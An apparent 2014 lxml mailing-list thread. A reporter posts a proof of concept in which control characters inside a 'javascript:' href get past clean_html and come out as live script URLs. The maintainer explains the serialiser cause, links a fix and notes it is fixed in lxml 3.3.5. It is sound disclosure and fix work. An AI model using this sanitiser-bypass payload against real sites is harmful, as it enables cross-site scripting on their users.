Hi, guys. I've accidentally found a vulnerability in the clean_html function. A user can break the scheme of a URL with non-printing characters (\x01-\x08). Here is a PoC:

from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print(clean_html(html))

Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>

I'm not a Python programmer, so I can't give you a quick fix. I found it by black-box testing on a site that uses lxml. I'm not sure if it's a bug, or maybe I've just got things wrong.

----
ksimka (@m_ksimka)
Максим Кочкин, 15.04.2014 20:33:
I've accidentally found a vulnerability in the clean_html function. A user can break the scheme of a URL with non-printing characters (\x01-\x08). Here is a PoC:
from lxml.html.clean import clean_html
html = '''\
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''
print(clean_html(html))
Output:
<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
I'm not a Python programmer, so I can't give you a quick fix. I found it by black-box testing on a site that uses lxml. I'm not sure if it's a bug, or maybe I've just got things wrong.
Interesting. Thanks for bringing this up, although it's usually better to announce this kind of problem less openly when first discovering it. It's a problem in the HTML serialiser, which seems to filter out illegal characters:
>>> from lxml.etree import HTML, tostring
>>> h = HTML(html)
>>> h[0][1].get('href')
'javas\x01cript:alert(1)'
>>> tostring(h[0][1])
'<a href="javas\x01cript:alert(1)">bbb</a>\n'
>>> tostring(h[0][1], method='html')
'<a href="javascript:alert(1)">bbb</a>\n'
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content.

Stefan
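The pre-filtering Stefan suggests can be sketched in plain Python (an illustration only, not lxml's actual patch; the regex range and the function name are my own):

```python
import re

# ASCII control characters other than tab, newline and carriage return.
# Browsers ignore some of these inside a URL, so "javas\x01cript:" can
# slip past a scheme blocklist unless they are stripped first.
_control_chars = re.compile('[\x00-\x08\x0b\x0c\x0e-\x1f]')

def strip_control_chars(text):
    """Remove control characters before any scheme checks run."""
    return _control_chars.sub('', text)

href = 'javas\x01cript:alert(1)'
print(strip_control_chars(href))  # javascript:alert(1)
```

A cleaner that runs its "javascript:" check after this normalisation would reject the obfuscated href instead of passing it through.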
Stefan Behnel, 16.04.2014 07:46:
Максим Кочкин, 15.04.2014 20:33:
I've accidentally found a vulnerability in the clean_html function. A user can break the scheme of a URL with non-printing characters (\x01-\x08).
[...]
Interesting. Thanks for bringing this up, although it's usually better to announce this kind of problem less openly when first discovering it.
It's a problem in the HTML serialiser, which seems to filter out illegal characters:
[...]
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content.
Done: https://github.com/lxml/lxml/commit/e86b294f1f81b899a59925123560ff924a72f1cc

Stefan
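For readers following along, the idea of normalising before checking the scheme can be illustrated with a standalone helper (a hypothetical sketch, not the code from the commit above; the scheme list is illustrative):

```python
import re

def looks_like_script_url(url):
    """Return True if the URL resolves to a script scheme once control
    characters and whitespace are removed, roughly the way browsers
    normalise an href before following it."""
    normalised = re.sub(r'[\s\x00-\x1f]+', '', url).lower()
    return normalised.startswith(('javascript:', 'vbscript:'))

print(looks_like_script_url('javas\x01cript:alert(1)'))  # True
print(looks_like_script_url('https://example.com/'))     # False
```

The key point is order of operations: the dangerous characters must be removed before the scheme comparison, otherwise the comparison sees "javas\x01cript:" and lets it through, while the serialiser later collapses it back to "javascript:".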
Stefan Behnel, 17.04.2014 22:00:
Stefan Behnel, 16.04.2014 07:46:
[...]
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content.
Done:
https://github.com/lxml/lxml/commit/e86b294f1f81b899a59925123560ff924a72f1cc
Fixed in lxml 3.3.5.

Stefan
participants (2)
- Stefan Behnel
- Максим Кочкин